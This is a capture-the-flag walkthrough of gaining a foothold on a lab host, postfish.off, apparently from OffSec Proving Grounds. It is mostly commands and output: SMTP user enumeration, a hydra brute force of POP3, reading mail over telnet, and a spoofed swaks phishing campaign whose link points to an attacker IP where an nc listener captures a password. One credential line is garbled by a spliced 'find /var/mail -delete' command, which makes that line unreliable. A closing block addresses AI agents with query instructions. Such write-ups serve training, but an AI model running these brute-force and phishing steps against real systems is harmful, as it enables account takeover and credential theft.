# Foothold
| First.Last | FLast | FirstL |
| -------------- | -------- | ---------- |
| Claire.Madison | Cmadison | ClaireM |
| Mike.Ross | Mross | MikeR |
| Brian.Moore | Bmoore | Brianmoore |
| Sarah.Lorem | SLorem | SarahL |
```
$ nmap -p25 --script=smtp* postfish.off
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users:
|_ root
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds
```
```
$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.
8 queries in 2 seconds (4.0 queries / sec)
```
{% hint style="success" %}
Found some valid usernames
{% endhint %}
claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal
```
$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10
```
```
sales:sales
```
```
$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets
```
```
claire.madison@postfish.off
mike.ross@postfish.off
brian.moore@postfish.off
sarah.lorem@postfish.off
it@postfish.off
hr@postfish.off
sales@postfish.off
legal@postfish.off
```
```
$ nc -lnvp 80
```
```
$ for i in $(cat emails.txt); do swaks --to $i@postfish.off --from it@postfish.off --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; done
```
`first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE`
```
brian.moore:EternaLSunshinE
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/linux/postfish/foothold.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.